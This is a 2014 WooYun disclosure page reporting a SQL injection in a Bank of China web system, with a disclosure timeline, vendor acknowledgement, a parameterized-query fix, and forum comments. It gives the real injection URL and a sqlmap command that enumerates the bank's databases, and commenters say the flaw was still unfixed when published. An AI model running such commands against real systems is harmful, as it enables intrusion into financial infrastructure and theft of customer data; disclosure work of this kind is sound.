当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076399

漏洞标题:中国银行某系统存在SQL注入漏洞

相关厂商:中国银行

漏洞作者: darkrerror

提交时间:2014-09-17 18:59

修复时间:2014-11-01 19:00

公开时间:2014-11-01 19:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-17: 细节已通知厂商并且等待厂商处理中
2014-09-22: 厂商已经确认,细节仅向厂商公开
2014-10-02: 细节向核心白帽子及相关领域专家公开
2014-10-12: 细节向普通白帽子公开
2014-10-22: 细节向实习白帽子公开
2014-11-01: 细节向公众公开

简要描述:

欢迎新厂商- -!!

详细说明:

http、https协议都可注射。
注射点:https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018
报错信息:

bc.jpg


sqlmap高级命令
sqlmap.py -u "https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018" --dbs --level=1

1.jpg


影响数据库:

dbs.jpg


当前数据库“EINNER”共287个表:

b.jpg


受影响的系统用户:

yh.jpg


漏洞证明:

dbs.jpg


yh.jpg

修复方案:

构造SQL查询时,请使用参数化查询、验证输入对用户输入的数据进行全面安全检查或过滤,尤其注意检查是否包含HTML特殊字符。这些检查或过滤必须在服务器端完成,建议过滤的常见危险字符。

版权声明:转载请注明来源 darkrerror@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-22 11:56

厂商回复:

非常感谢漏洞作者的发现,我们将尽快修补。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-17 18:59 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这是欢迎新厂商的节奏啊

  2. 2014-09-17 19:00 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    吓尿了

  3. 2014-09-17 19:13 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @浩天 @疯狗 洞主是想告诉你们中国很行

  4. 2014-09-17 19:48 | 番茄炒蛋 ( 普通白帽子 | Rank:106 漏洞数:31 | test)

    大牛。。

  5. 2014-09-17 20:01 | George乔治 ( 路人 | Rank:6 漏洞数:2 | www.cnseu.cn)

    笑尿了我啊啊

  6. 2014-09-17 20:06 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    一群死黑阔 一个个都这么牛b

  7. 2014-09-17 20:43 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    好厉害的样子啊。

  8. 2014-09-17 20:55 | JJ Fly ( 普通白帽子 | Rank:317 漏洞数:59 | 今天播下一颗种子。)

    真叼。

  9. 2014-09-17 21:11 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    专注SQL 20年!!! 蓝翔开学入学考试 望通过

  10. 2014-09-17 21:12 | jas10nsec ( 路人 | Rank:14 漏洞数:4 | 学习网络与信息安全中)

    洞主好搞笑啊

  11. 2014-09-17 22:30 | darkrerror ( 普通白帽子 | Rank:263 漏洞数:44 )

    @疯狗 怎么把名称改了- -

  12. 2014-09-17 22:49 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    新...厂...商...

  13. 2014-09-18 01:26 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    一群狼啊。

  14. 2014-09-19 18:31 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    新厂商来了

  15. 2014-09-22 17:05 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @浩天 @疯狗 我擦 有中国银行啊 不客气了·

  16. 2014-09-22 18:10 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @爱上平顶山 期待你为中国银行安全性作出贡献的案例

  17. 2014-09-22 19:00 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @爱上平顶山 感谢您对中国很行做出的贡献

  18. 2014-11-01 21:20 | 侦探911 ( 普通白帽子 | Rank:133 漏洞数:21 | 学习)

    现在都还没修复。。。也是醉了

  19. 2014-11-01 21:39 | 1angxi ( 路人 | Rank:2 漏洞数:1 | 研究僧,安全新手,我只是来打酱油的...)

    还没完全修复..

  20. 2014-11-02 02:02 | 0ps ( 实习白帽子 | Rank:43 漏洞数:10 | xo)

    专业马赛克!!!!!

  21. 2014-11-02 13:26 | aNsSe ( 路人 | Rank:0 漏洞数:2 | 独自一人走天下)

    卧槽! 洞主你为何这么叼!

  22. 2014-11-02 15:21 | darkrerror ( 普通白帽子 | Rank:263 漏洞数:44 )

    @0ps - -